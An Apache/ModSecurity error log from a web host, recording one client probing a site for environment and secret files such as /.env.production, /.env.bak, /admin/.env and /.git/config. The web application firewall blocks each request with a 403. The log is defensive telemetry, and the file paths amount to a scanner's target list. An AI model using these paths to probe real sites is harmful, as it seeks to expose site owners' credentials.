[Mon May 11 22:41:39.190616 2026] [security2:error] [pid 1606352:tid 1606432] [client 88.151.32.80:35018] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/backend/.env"] [unique_id "agI_A3o_DFxNSZVmaX3WHwAAAM0"]
[Mon May 11 22:41:39.190625 2026] [security2:error] [pid 1606352:tid 1606437] [client 88.151.32.80:35032] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/public/.env"] [unique_id "agI_A3o_DFxNSZVmaX3WIAAAANI"]
[Mon May 11 22:41:39.190787 2026] [security2:error] [pid 1606352:tid 1606437] [client 88.151.32.80:35032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/public/.env"] [unique_id "agI_A3o_DFxNSZVmaX3WIAAAANI"]
[Mon May 11 22:41:39.190790 2026] [security2:error] [pid 1606352:tid 1606432] [client 88.151.32.80:35018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/backend/.env"] [unique_id "agI_A3o_DFxNSZVmaX3WHwAAAM0"]
[Mon May 11 22:41:39.190865 2026] [security2:error] [pid 1534836:tid 1534891] [client 88.151.32.80:34974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.staging"] [unique_id "agI_A9eaRXe5lR8y0ZO6HgAAAVQ"]
[Mon May 11 22:41:39.191088 2026] [security2:error] [pid 1534836:tid 1534891] [client 88.151.32.80:34974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.staging"] [unique_id "agI_A9eaRXe5lR8y0ZO6HgAAAVQ"]
[Mon May 11 22:41:39.191120 2026] [security2:error] [pid 1606352:tid 1606437] [client 88.151.32.80:35032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/public/.env"] [unique_id "agI_A3o_DFxNSZVmaX3WIAAAANI"]
[Mon May 11 22:41:39.190658 2026] [security2:error] [pid 1606352:tid 1606813] [client 88.151.32.80:34942] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.bak"] [unique_id "agI_A3o_DFxNSZVmaX3WHQAAANg"]
[Mon May 11 22:41:39.191449 2026] [security2:error] [pid 1534836:tid 1534891] [client 88.151.32.80:34974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.staging"] [unique_id "agI_A9eaRXe5lR8y0ZO6HgAAAVQ"]
[Mon May 11 22:41:39.191801 2026] [security2:error] [pid 1601130:tid 1601152] [client 88.151.32.80:34926] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.backup"] [unique_id "agI_A3EgAO_835W6c1mbewAAAEI"]
[Mon May 11 22:41:39.192505 2026] [security2:error] [pid 1601130:tid 1601152] [client 88.151.32.80:34926] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.backup"] [unique_id "agI_A3EgAO_835W6c1mbewAAAEI"]
[Mon May 11 22:41:39.196078 2026] [security2:error] [pid 1606352:tid 1606813] [client 88.151.32.80:34942] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.bak"] [unique_id "agI_A3o_DFxNSZVmaX3WHQAAANg"]
[Mon May 11 22:41:39.203067 2026] [security2:error] [pid 1605480:tid 1605544] [client 88.151.32.80:34976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.test"] [unique_id "agI_Ax2Cvzd_nyNfUm8D2QAAARY"]
[Mon May 11 22:41:39.189876 2026] [security2:error] [pid 1605480:tid 1605540] [client 88.151.32.80:34958] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.old"] [unique_id "agI_Ax2Cvzd_nyNfUm8D3AAAARI"]
[Mon May 11 22:41:39.203528 2026] [security2:error] [pid 1605480:tid 1605540] [client 88.151.32.80:34958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.old"] [unique_id "agI_Ax2Cvzd_nyNfUm8D3AAAARI"]
[Mon May 11 22:41:39.203614 2026] [security2:error] [pid 1534836:tid 1534875] [client 88.151.32.80:34916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.development"] [unique_id "agI_A9eaRXe5lR8y0ZO6GgAAAUQ"]
[Mon May 11 22:41:39.185794 2026] [security2:error] [pid 1534836:tid 1534890] [client 88.151.32.80:34896] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.example"] [unique_id "agI_A9eaRXe5lR8y0ZO6HAAAAVM"]
[Mon May 11 22:41:39.205284 2026] [security2:error] [pid 1534836:tid 1534890] [client 88.151.32.80:34896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.example"] [unique_id "agI_A9eaRXe5lR8y0ZO6HAAAAVM"]
[Mon May 11 22:41:39.205621 2026] [security2:error] [pid 1534836:tid 1534890] [client 88.151.32.80:34896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.example"] [unique_id "agI_A9eaRXe5lR8y0ZO6HAAAAVM"]
[Mon May 11 22:41:39.206761 2026] [security2:error] [pid 1590352:tid 1590411] [client 88.151.32.80:34822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.git/config"] [unique_id "agI_A61q0G_aXAqWauT_wwAAAJM"]
[Mon May 11 22:41:39.189789 2026] [security2:error] [pid 1588898:tid 1588922] [client 88.151.32.80:35010] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/admin/.env"] [unique_id "agI_A6FW67LJTsgN3jQQoQAAABg"]
[Mon May 11 22:41:39.208532 2026] [security2:error] [pid 1588898:tid 1588922] [client 88.151.32.80:35010] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/admin/.env"] [unique_id "agI_A6FW67LJTsgN3jQQoQAAABg"]
[Mon May 11 22:41:39.209813 2026] [security2:error] [pid 1605480:tid 1605540] [client 88.151.32.80:34958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.old"] [unique_id "agI_Ax2Cvzd_nyNfUm8D3AAAARI"]
[Mon May 11 22:41:39.189785 2026] [security2:error] [pid 1534836:tid 1534883] [client 88.151.32.80:35020] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/app/.env"] [unique_id "agI_A9eaRXe5lR8y0ZO6HQAAAUw"]
[Mon May 11 22:41:39.246311 2026] [security2:error] [pid 1534836:tid 1534871] [client 88.151.32.80:34910] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.local"] [unique_id "agI_A9eaRXe5lR8y0ZO6GwAAAUE"]
[Mon May 11 22:41:39.246336 2026] [security2:error] [pid 1606352:tid 1606432] [client 88.151.32.80:35018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/backend/.env"] [unique_id "agI_A3o_DFxNSZVmaX3WHwAAAM0"]
[Mon May 11 22:41:39.246513 2026] [security2:error] [pid 1601130:tid 1601152] [client 88.151.32.80:34926] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.backup"] [unique_id "agI_A3EgAO_835W6c1mbewAAAEI"]
[Mon May 11 22:41:39.186113 2026] [security2:error] [pid 1588898:tid 1588913] [client 88.151.32.80:34880] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env"] [unique_id "agI_A6FW67LJTsgN3jQQogAAAA4"]
[Mon May 11 22:41:39.246691 2026] [security2:error] [pid 1534836:tid 1534883] [client 88.151.32.80:35020] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/app/.env"] [unique_id "agI_A9eaRXe5lR8y0ZO6HQAAAUw"]
[Mon May 11 22:41:39.246813 2026] [security2:error] [pid 1606352:tid 1606813] [client 88.151.32.80:34942] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.bak"] [unique_id "agI_A3o_DFxNSZVmaX3WHQAAANg"]
[Mon May 11 22:41:39.246909 2026] [security2:error] [pid 1588898:tid 1588913] [client 88.151.32.80:34880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env"] [unique_id "agI_A6FW67LJTsgN3jQQogAAAA4"]
[Mon May 11 22:41:39.247566 2026] [security2:error] [pid 1588898:tid 1588922] [client 88.151.32.80:35010] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/admin/.env"] [unique_id "agI_A6FW67LJTsgN3jQQoQAAABg"]
[Mon May 11 22:41:39.254352 2026] [security2:error] [pid 1588898:tid 1588913] [client 88.151.32.80:34880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env"] [unique_id "agI_A6FW67LJTsgN3jQQogAAAA4"]
[Mon May 11 22:41:39.261520 2026] [security2:error] [pid 1534836:tid 1534883] [client 88.151.32.80:35020] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/app/.env"] [unique_id "agI_A9eaRXe5lR8y0ZO6HQAAAUw"]
[Mon May 11 22:41:39.749552 2026] [security2:error] [pid 1601130:tid 1601165] [client 88.151.32.80:34900] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.production"] [unique_id "agI_A3EgAO_835W6c1mbfAAAAE8"]
[Mon May 11 22:41:39.750486 2026] [security2:error] [pid 1601130:tid 1601165] [client 88.151.32.80:34900] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.production"] [unique_id "agI_A3EgAO_835W6c1mbfAAAAE8"]
[Mon May 11 22:41:39.751766 2026] [security2:error] [pid 1601130:tid 1601165] [client 88.151.32.80:34900] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.production"] [unique_id "agI_A3EgAO_835W6c1mbfAAAAE8"]
[Mon May 11 22:42:03.496046 2026] [security2:error] [pid 1588898:tid 1588913] [client 43.134.104.17:52470] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.fr"] [uri "/"] [unique_id "agI_G6FW67LJTsgN3jQQ0QAAAA4"]
[Mon May 11 22:42:14.519044 2026] [security2:error] [pid 1606352:tid 1606423] [client 43.153.27.244:60870] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-json/wp/v2/pages/2"] [unique_id "agI_Jno_DFxNSZVmaX3WSQAAAMQ"]
[Mon May 11 22:42:24.561579 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 34.174.169.211:59106] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php
[Mon May 11 22:42:24.562029 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 34.174.169.211:59106] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php5
[Mon May 11 22:42:24.562072 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 34.174.169.211:59106] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php4
[Mon May 11 22:42:24.562484 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 34.174.169.211:59106] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php3
